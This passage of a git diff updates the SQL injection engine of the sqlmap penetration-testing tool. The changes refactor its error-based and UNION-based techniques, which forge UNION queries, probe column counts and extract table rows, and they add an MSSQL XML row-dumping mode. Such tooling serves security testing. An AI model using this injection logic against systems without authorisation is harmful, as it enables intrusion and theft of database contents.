status = "%s..." % status[:width - 3] + + dataToStdout("%s\n" % status) if isinstance(num, int): expression = origExpr @@ -262,7 +298,7 @@ def errorUse(expression, dump=False): _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) # Set kb.partRun in case the engine is called from the API - kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None + kb.partRun = getPartRun(alias=False) if conf.api else None # We have to check if the SQL query might return multiple entries # and in such case forge the SQL limiting the query output one @@ -316,87 +352,94 @@ def errorUse(expression, dump=False): value = [] # for empty tables return value - if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD: - message = "due to huge table size do you want to remove " - message += "ORDER BY clause gaining speed over consistency? [y/N] " - _ = readInput(message, default="N") + if isNumPosStrValue(count) and int(count) > 1: + if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD: + message = "due to huge table size do you want to remove " + message += "ORDER BY clause gaining speed over consistency? [y/N] " - if _ and _[0] in ("y", "Y"): - expression = expression[:expression.index(" ORDER BY ")] + if readInput(message, default="N", boolean=True): + expression = expression[:expression.index(" ORDER BY ")] - numThreads = min(conf.threads, (stopLimit - startLimit)) + numThreads = min(conf.threads, (stopLimit - startLimit)) - threadData = getCurrentThreadData() - threadData.shared.limits = iter(xrange(startLimit, stopLimit)) - threadData.shared.value = BigArray() - threadData.shared.buffered = [] - threadData.shared.counter = 0 - threadData.shared.lastFlushed = startLimit - 1 - threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 + threadData = getCurrentThreadData() - if threadData.shared.showEta: - threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) + try: + threadData.shared.limits = iter(xrange(startLimit, stopLimit)) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) - if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): - for field in expressionFieldsList: - if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': - emptyFields.append(field) - debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable) - debugMsg += "dumped as it appears to be empty" - logger.debug(debugMsg) + threadData.shared.value = BigArray() + threadData.shared.buffered = [] + threadData.shared.counter = 0 + threadData.shared.lastFlushed = startLimit - 1 + threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 - if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: - kb.suppressResumeInfo = True - debugMsg = "suppressing possible resume console info because of " - debugMsg += "large number of rows. 
It might take too long" - logger.debug(debugMsg) + if threadData.shared.showEta: + threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) - try: - def errorThread(): - threadData = getCurrentThreadData() + if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): + for field in expressionFieldsList: + if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': + emptyFields.append(field) + debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable) + debugMsg += "dumped as it appears to be empty" + logger.debug(debugMsg) - while kb.threadContinue: - with kb.locks.limit: - try: - valueStart = time.time() - threadData.shared.counter += 1 - num = threadData.shared.limits.next() - except StopIteration: + if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: + kb.suppressResumeInfo = True + debugMsg = "suppressing possible resume console info because of " + debugMsg += "large number of rows. It might take too long" + logger.debug(debugMsg) + + try: + def errorThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + with kb.locks.limit: + try: + valueStart = time.time() + threadData.shared.counter += 1 + num = threadData.shared.limits.next() + except StopIteration: + break + + output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta) + + if not kb.threadContinue: break - output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta) + if output and isListLike(output) and len(output) == 1: + output = output[0] - if not kb.threadContinue: - break + with kb.locks.value: + index = None + if threadData.shared.showEta: + threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, output)) + while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: + threadData.shared.lastFlushed += 1 + threadData.shared.value.append(threadData.shared.buffered[0][1]) + del threadData.shared.buffered[0] - if output and isListLike(output) and len(output) == 1: - output = output[0] + runThreads(numThreads, errorThread) - with kb.locks.value: - index = None - if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, output)) - while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: - threadData.shared.lastFlushed += 1 - threadData.shared.value.append(threadData.shared.buffered[0][1]) - del threadData.shared.buffered[0] + except KeyboardInterrupt: + abortedFlag = True + warnMsg = "user aborted during enumeration. sqlmap " + warnMsg += "will display partial output" + logger.warn(warnMsg) - runThreads(numThreads, errorThread) - - except KeyboardInterrupt: - abortedFlag = True - warnMsg = "user aborted during enumeration. 
sqlmap " - warnMsg += "will display partial output" - logger.warn(warnMsg) - - finally: - threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered)) - value = threadData.shared.value - kb.suppressResumeInfo = False + finally: + threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered)) + value = threadData.shared.value + kb.suppressResumeInfo = False if not value and not abortedFlag: value = _errorFields(expression, expressionFields, expressionFieldsList) diff --git a/lib/techniques/union/__init__.py b/lib/techniques/union/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/techniques/union/__init__.py +++ b/lib/techniques/union/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index a498bf08c..ac0472155 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import logging import random import re @@ -52,11 +53,11 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) query = agent.suffixQuery(query, suffix=suffix, comment=comment) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - return not re.search(r"(warning|error|order by|failed)", page or "", re.I) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I) + page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) + return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) if _orderByTest(1) and not _orderByTest(randomInt()): - infoMsg = "ORDER BY technique seems to be usable. " + infoMsg = "'ORDER BY' technique appears to be usable. " infoMsg += "This should reduce the time needed " infoMsg += "to find the right number " infoMsg += "of query columns. 
Automatically extending the " @@ -104,24 +105,26 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= for count in xrange(lowerCount, upperCount + 1): query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) + page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) if not isNullValue(kb.uChar): pages[count] = page - ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO + ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO ratios.append(ratio) min_, max_ = min(min_, ratio), max(max_, ratio) items.append((count, ratio)) if not isNullValue(kb.uChar): for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar): - contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()] - if len(filter(lambda x: x[1], contains)) == 1: - retVal = filter(lambda x: x[1], contains)[0][0] + contains = [(count, re.search(regex, _ or "", re.IGNORECASE) is not None) for count, _ in pages.items()] + if len(filter(lambda _: _[1], contains)) == 1: + retVal = filter(lambda _: _[1], contains)[0][0] break if not retVal: - ratios.pop(ratios.index(min_)) - ratios.pop(ratios.index(max_)) + if min_ in ratios: + ratios.pop(ratios.index(min_)) + if max_ in ratios: + ratios.pop(ratios.index(max_)) minItem, maxItem = None, None @@ -131,10 +134,10 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= elif item[1] == max_: maxItem = item - if all(map(lambda x: x == min_ and x != max_, ratios)): + if all(_ == min_ and _ != max_ for _ in ratios): retVal = maxItem[0] - elif all(map(lambda x: x != min_ and x == max_, ratios)): + elif all(_ != min_ and _ == max_ for _ in ratios): retVal = minItem[0] elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE: @@ -152,7 +155,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= if retVal: infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal - singleTimeLogMessage(infoMsg) + singleTimeLogMessage(infoMsg, logging.INFO, re.sub(r"\d+", "N", infoMsg)) return retVal @@ -165,74 +168,78 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO # Unbiased approach for searching appropriate usable column random.shuffle(positions) - # For each column of the table (# of NULL) perform a request using - # the UNION ALL SELECT statement to test it the target URL is - # affected by an exploitable union SQL injection vulnerability - for position in positions: - # Prepare expression with delimiters - randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) - phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop) - randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) - randQueryUnescaped = unescaper.escape(randQueryProcessed) + for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS): + if vector: + break - # Forge the union SQL injection request - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + # For each column of the table (# of NULL) perform a request using + # the UNION ALL SELECT statement to test it the target URL is + # affected by an exploitable union SQL injection 
vulnerability + for position in positions: + # Prepare expression with delimiters + randQuery = randomStr(charCount) + phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop) + randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) + randQueryUnescaped = unescaper.escape(randQueryProcessed) - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") + # Forge the union SQL injection request + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - if content and phrase in content: - validPayload = payload - kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False) + # Perform the request + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ + removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ + payload, True) or "") - if where == PAYLOAD.WHERE.ORIGINAL: - # Prepare expression with delimiters - randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS) - phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop) - randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) - randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) + if content and phrase in content: + validPayload = payload + kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False) - # Confirm that it is a full union SQL injection - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + if where == PAYLOAD.WHERE.ORIGINAL: + # Prepare expression with delimiters + randQuery2 = randomStr(charCount) + phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop) + randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) + randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") - - if not all(_ in content for _ in (phrase, phrase2)): - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) - elif not kb.unionDuplicates: - fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) - - # Check for limited row output - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + # Confirm that it is a full union SQL injection + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) payload = agent.payload(place=place, 
parameter=parameter, newValue=query, where=where) # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") - if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: - warnMsg = "output with limited number of rows detected. Switching to partial mode" - logger.warn(warnMsg) - vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates, False) + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") - unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() + if not all(_ in content for _ in (phrase, phrase2)): + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) + elif not kb.unionDuplicates: + fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) - if unionErrorCase and count > 1: - warnMsg = "combined UNION/error-based SQL injection case found on " - warnMsg += "column %d. sqlmap will try to find another " % (position + 1) - warnMsg += "column with better characteristics" - logger.warn(warnMsg) - else: - break + # Check for limited row output + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + + # Perform the request + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ + removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ + payload, True) or "") + if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: + warnMsg = "output with limited number of rows detected. Switching to partial mode" + logger.warn(warnMsg) + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) + + unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() + + if unionErrorCase and count > 1: + warnMsg = "combined UNION/error-based SQL injection case found on " + warnMsg += "column %d. sqlmap will try to find another " % (position + 1) + warnMsg += "column with better characteristics" + logger.warn(warnMsg) + else: + break return validPayload, vector @@ -276,8 +283,8 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) if not conf.uChar and count > 1 and kb.uChar == NULL: message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] " - test = readInput(message, default="Y") - if test[0] not in ("y", "Y"): + + if not readInput(message, default="Y", boolean=True): warnMsg += "usage of option '--union-char' " warnMsg += "(e.g. 
'--union-char=1') " else: diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 034223c52..11a32a96f 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -1,12 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import binascii import re import time +import xml.etree.ElementTree from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent @@ -43,10 +45,13 @@ from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapSyntaxException from lib.core.settings import MAX_BUFFERED_PARTIAL_UNION_LENGTH +from lib.core.settings import NULL from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT +from lib.core.settings import UNICODE_ENCODING from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.core.unescaper import unescaper @@ -55,54 +60,93 @@ from lib.utils.progress import ProgressBar from thirdparty.odict.odict import OrderedDict def _oneShotUnionUse(expression, unpack=True, limited=False): - retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as union data is stored raw unconverted + retVal = hashDBRetrieve("%s%s" % (conf.hexConvert or False, expression), checkConf=True) # as UNION data is stored raw unconverted threadData = getCurrentThreadData() threadData.resumed = retVal is not None if retVal is None: - # Prepare expression with delimiters - injExpression = unescaper.escape(agent.concatQuery(expression, unpack)) - - # Forge the union SQL injection request vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector - kb.unionDuplicates = vector[7] - kb.forcePartialUnion = vector[8] - query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) - where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6] + + if not kb.rowXmlMode: + injExpression = unescaper.escape(agent.concatQuery(expression, unpack)) + kb.unionDuplicates = vector[7] + kb.forcePartialUnion = vector[8] + query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) + where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6] + else: + where = vector[6] + query = agent.forgeUnionQuery(expression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False) + payload = agent.payload(newValue=query, where=where) # Perform the request - page, headers = Request.queryPage(payload, content=True, raise404=False) + page, headers, _ = Request.queryPage(payload, content=True, raise404=False) incrementCounter(PAYLOAD.TECHNIQUE.UNION) - # Parse the returned page to get the exact union-based - # SQL injection output - def _(regex): - return reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \ - extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \ - if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \ - None) + if not kb.rowXmlMode: + # Parse the returned 
page to get the exact UNION-based + # SQL injection output + def _(regex): + return reduce(lambda x, y: x if x is not None else y, (\ + extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \ + extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \ + if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \ + None) - # Automatically patching last char trimming cases - if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): - warnMsg = "automatically patching output having last char trimmed" - singleTimeWarnMessage(warnMsg) - page = page.replace(kb.chars.stop[:-1], kb.chars.stop) + # Automatically patching last char trimming cases + if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): + warnMsg = "automatically patching output having last char trimmed" + singleTimeWarnMessage(warnMsg) + page = page.replace(kb.chars.stop[:-1], kb.chars.stop) - retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop)) + retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop)) + else: + output = extractRegexResult(r"(?P<result>(<row.+?/>)+)", page) + if output: + try: + root = xml.etree.ElementTree.fromstring("<root>%s</root>" % output.encode(UNICODE_ENCODING)) + retVal = "" + for column in kb.dumpColumns: + base64 = True + for child in root: + value = child.attrib.get(column, "").strip() + if value and not re.match(r"\A[a-zA-Z0-9+/]+={0,2}\Z", value): + base64 = False + break + + try: + value.decode("base64") + except binascii.Error: + base64 = False + break + + if base64: + for child in root: + child.attrib[column] = child.attrib.get(column, "").decode("base64") or NULL + + for child in root: + row = [] + for column in kb.dumpColumns: + row.append(child.attrib.get(column, NULL)) + retVal += "%s%s%s" % (kb.chars.start, kb.chars.delimiter.join(row), kb.chars.stop) + + except: + pass + else: + retVal = getUnicode(retVal) if retVal is not None: retVal = getUnicode(retVal, kb.pageEncoding) - # Special case when DBMS is Microsoft SQL Server and error message is used as a result of union injection + # Special case when DBMS is Microsoft SQL Server and error message is used as a result of UNION injection if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError(): retVal = htmlunescape(retVal).replace("<br>", "\n") - hashDBWrite("%s%s" % (conf.hexConvert, expression), retVal) - else: + hashDBWrite("%s%s" % (conf.hexConvert or False, expression), retVal) + + elif not kb.rowXmlMode: trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start)) if trimmed: @@ -110,6 +154,9 @@ def _oneShotUnionUse(expression, unpack=True, limited=False): warnMsg += "(probably due to its length and/or content): " warnMsg += safecharencode(trimmed) logger.warn(warnMsg) + else: + vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector + kb.unionDuplicates = vector[7] return retVal @@ -148,9 +195,9 @@ def configUnion(char=None, columns=None): def unionUse(expression, unpack=True, dump=False): """ - This function tests for an union SQL injection on the target + This function tests for an UNION SQL injection on the target URL then call its subsidiary function to effectively perform an - union SQL injection on the affected URL + UNION SQL injection on the affected URL """ initTechnique(PAYLOAD.TECHNIQUE.UNION) @@ -168,11 +215,18 @@ def unionUse(expression, unpack=True, dump=False): _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) # Set kb.partRun in case the engine is 
called from the API - kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None + kb.partRun = getPartRun(alias=False) if conf.api else None + + if Backend.isDbms(DBMS.MSSQL) and kb.dumpColumns: + kb.rowXmlMode = True + _ = "(%s FOR XML RAW, BINARY BASE64)" % expression + output = _oneShotUnionUse(_, False) + value = parseUnionPage(output) + kb.rowXmlMode = False if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): # Removed ORDER BY clause because UNION does not play well with it - expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) + expression = re.sub("(?i)\s*ORDER BY\s+[\w,]+", "", expression) debugMsg = "stripping ORDER BY clause from statement because " debugMsg += "it does not play well with UNION query SQL injection" singleTimeDebugMessage(debugMsg) @@ -182,7 +236,7 @@ def unionUse(expression, unpack=True, dump=False): # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries - if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ + if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ kb.forcePartialUnion or \ (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \ " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ @@ -230,118 +284,127 @@ def unionUse(expression, unpack=True, dump=False): value = [] # for empty tables return value - threadData = getCurrentThreadData() - threadData.shared.limits = iter(xrange(startLimit, stopLimit)) - numThreads = min(conf.threads, (stopLimit - startLimit)) - threadData.shared.value = BigArray() - threadData.shared.buffered = [] - threadData.shared.counter = 0 - threadData.shared.lastFlushed = startLimit - 1 - threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 + if isNumPosStrValue(count) and int(count) > 1: + threadData = getCurrentThreadData() - if threadData.shared.showEta: - threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) + try: + threadData.shared.limits = iter(xrange(startLimit, stopLimit)) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) - if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: - kb.suppressResumeInfo = True - debugMsg = "suppressing possible resume console info because of " - debugMsg += "large number of rows. It might take too long" - logger.debug(debugMsg) + numThreads = min(conf.threads, (stopLimit - startLimit)) + threadData.shared.value = BigArray() + threadData.shared.buffered = [] + threadData.shared.counter = 0 + threadData.shared.lastFlushed = startLimit - 1 + threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 - try: - def unionThread(): - threadData = getCurrentThreadData() + if threadData.shared.showEta: + threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) - while kb.threadContinue: - with kb.locks.limit: - try: - valueStart = time.time() - threadData.shared.counter += 1 - num = threadData.shared.limits.next() - except StopIteration: + if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: + kb.suppressResumeInfo = True + debugMsg = "suppressing possible resume console info because of " + debugMsg += "large number of rows. 
It might take too long" + logger.debug(debugMsg) + + try: + def unionThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + with kb.locks.limit: + try: + valueStart = time.time() + threadData.shared.counter += 1 + num = threadData.shared.limits.next() + except StopIteration: + break + + if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): + field = expressionFieldsList[0] + elif Backend.isDbms(DBMS.ORACLE): + field = expressionFieldsList + else: + field = None + + limitedExpr = agent.limitQuery(num, expression, field) + output = _oneShotUnionUse(limitedExpr, unpack, True) + + if not kb.threadContinue: break - if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): - field = expressionFieldsList[0] - elif Backend.isDbms(DBMS.ORACLE): - field = expressionFieldsList - else: - field = None + if output: + with kb.locks.value: + if all(_ in output for _ in (kb.chars.start, kb.chars.stop)): + items = parseUnionPage(output) - limitedExpr = agent.limitQuery(num, expression, field) - output = _oneShotUnionUse(limitedExpr, unpack, True) + if threadData.shared.showEta: + threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) + if isListLike(items): + # in case that we requested N columns and we get M!=N then we have to filter a bit + if len(items) > 1 and len(expressionFieldsList) > 1: + items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] + items = [_ for _ in flattenValue(items)] + if len(items) > len(expressionFieldsList): + filtered = OrderedDict() + for item in items: + key = re.sub(r"[^A-Za-z0-9]", "", item).lower() + if key not in filtered or re.search(r"[^A-Za-z0-9]", item): + filtered[key] = item + items = filtered.values() + items = [items] + index = None + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, items)) + else: + index = None + if threadData.shared.showEta: + threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, None)) - if not kb.threadContinue: - break + items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) - if output: - with kb.locks.value: - if all(map(lambda _: _ in output, (kb.chars.start, kb.chars.stop))): - items = parseUnionPage(output) + while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): + threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] + if not isNoneValue(_): + threadData.shared.value.extend(arrayizeValue(_)) + del threadData.shared.buffered[0] - if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) - if isListLike(items): - # in case that we requested N columns and we get M!=N then we have to filter a bit - if len(items) > 1 and len(expressionFieldsList) > 1: - items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] - items = [_ for _ in flattenValue(items)] - if len(items) > len(expressionFieldsList): - filtered = OrderedDict() - for item in items: - key = 
